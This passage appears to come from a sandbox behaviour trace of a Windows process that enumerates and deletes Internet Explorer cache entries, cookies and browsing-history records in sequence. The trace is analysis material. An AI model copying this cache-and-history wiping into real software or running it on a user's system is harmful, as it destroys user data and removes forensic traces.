FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.938] DeleteUrlCacheEntryW (lpszUrlName="https://s.ytimg.com/yts/jsbin/www-embed-player-vfl1OElWj/www-embed-player.js") returned 1 [0039.939] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.939] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.939] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/Java3BillDevices_EN.png") returned 1 [0039.940] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.940] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.940] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.typekit.net/af/6324fc/000000000000000000017823/27/i?fvd=n4") returned 1 [0039.941] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.941] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.941] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress_bg_left.png") returned 1 [0039.942] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.942] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.942] DeleteUrlCacheEntryW (lpszUrlName="https://cdn.mxpnl.com/libs/mixpanel-2-latest.min.js") returned 1 [0039.944] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.944] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.944] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/application-d1d145dce6ea0bacf3606f65e00dede4.js") returned 1 [0039.945] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.945] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.945] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/moodle/img/moodle-stack-110x117-b4c9d2ac997b62c51c52bacd3073627b.png") returned 1 [0039.945] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.946] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.946] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/espocrm/img/espocrm-stack-110x117-e76924d8ecff5a076623a6f185f393d2.png") returned 1 [0039.946] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.946] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.947] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/rtutils.js") returned 1 [0039.947] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.947] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.947] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress.html") returned 1 [0039.955] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.955] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.955] DeleteUrlCacheEntryW (lpszUrlName="https://use.typekit.net/yvn2smh.js") returned 1 [0039.956] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.956] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.956] DeleteUrlCacheEntryW (lpszUrlName="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js") returned 1 [0039.957] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.957] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.957] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/welcome_en.wxl") returned 1 [0039.958] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.958] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.958] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/xampp/img/xampp-stack-110x117-8860301a0d505dd237e2c771fc846604.png") returned 1 [0039.959] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.959] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.959] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/prestashop/img/prestashop-stack-110x117-f5eedb78a717c574d9d4de512e2489f2.png") returned 1 [0039.960] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.960] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.960] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/sugarcrm/img/sugarcrm-stack-110x117-d32ce88b49535af1a34f9e8eb32b580b.png") returned 1 [0039.961] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.961] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.961] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/testlink/img/testlink-stack-110x117-229ea25393ffb1f1fb70c2a89a2bf50a.png") returned 1 [0039.962] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.962] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.962] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/processwire/img/processwire-stack-110x117-cc41a533cdf4036063ac7e842ddf3cdb.png") returned 1 [0039.963] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.963] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.963] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/check.png") returned 1 [0039.963] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.963] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.964] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/webfontloader-2b504d3458be4f0942a946c399ca7785.js") returned 1 [0039.964] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.964] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.964] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/bootstrap/glyphicons-halflings-regular.eot?") returned 1 [0039.965] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.965] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.965] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/drupal/img/drupal-stack-110x117-9083fe6b191b13f79863eff74d3ce382.png") returned 1 [0039.966] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.966] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.966] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/mautic/img/mautic-stack-110x117-3262d5fe97ca64605e94bd45eaf0f533.png") returned 1 [0039.967] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.967] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.967] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/osclass/img/osclass-stack-110x117-3f9de13b910fcea89a6ded32b6302d5d.png") returned 1 [0039.970] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.970] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71ac5b0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71ac5b0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.970] DeleteUrlCacheEntryW (lpszUrlName="http://localhost/") returned 1 [0039.972] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.972] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.972] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/wordpress/img/wordpress-stack-110x117-95cc5cc975831baa456f27d7f19c342f.png") returned 1 [0039.973] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.973] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.973] DeleteUrlCacheEntryW (lpszUrlName="https://www.google-analytics.com/analytics.js") returned 1 [0039.974] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.974] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.974] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/application_split2-bb4a2bfcd05117c8c1eb955878f24132.css") returned 1 [0039.975] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.975] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.975] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.typekit.net/af/425691/000000000000000000017821/27/i?fvd=n3") returned 1 [0039.976] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.977] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.977] DeleteUrlCacheEntryW (lpszUrlName="Cookie:dssdpmx042@bitnami.com/") returned 1 [0039.979] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.979] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.979] DeleteUrlCacheEntryW (lpszUrlName="Cookie:dssdpmx042@youtube.com/") returned 1 [0039.980] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.980] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.980] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@https://www.facebook.com") returned 1 [0039.980] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.981] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.981] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173ea4&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0039.981] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.981] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.981] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.bing.com/search?q=java+jre&qs=n&form=QBRE&pq=java+jre&sc=8-5&sp=-1&sk=&cvid=ADBD7C03E6AD480ABA62FB3F604427FD") returned 1 [0039.981] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.981] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.981] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173e93&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0039.981] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.981] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.981] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173eb1&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0039.982] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.982] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x719df70, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x719df70, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.982] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/java/fw_error.html?referenceerror=18.9a0a1602.1472485731.1284bf23&referer=http://java.com/verify9") returned 1 [0039.982] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.982] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.982] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173ebb&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0039.982] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.982] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.982] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@res://C:\\Windows\\system32\\mmcndmgr.dll/views.htm") returned 1 [0039.983] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.006] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.007] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@https://bitnami.com/stack/xampp?utm_source=bitnami&utm_medium=installer&utm_campaign=XAMPP%2BInstaller") returned 1 [0040.007] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.007] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x715aaf0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x715aaf0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.007] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.bing.com/favicon.ico") returned 1 [0040.007] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.007] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.007] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.bing.com/search?q=java&FORM=IE8SRC") returned 1 [0040.007] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.008] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71622d0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.008] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@http://www.oracle.com/splash/www/fw_error.html?referenceerror=18.720a1602.1472485731.1173eb3&referer=http://www.oracle.com/splash/www/fw_error.html") returned 1 [0040.008] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.008] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0040.008] DeleteUrlCacheEntryW (lpszUrlName="Visited: DSsDPMx042@https://d33np9n32j53g7.cloudfront.net/assets/new/favicon-1b3baea7fd1b9182e71366507efa5d6e.png") returned 1 [0040.008] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0040.008] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 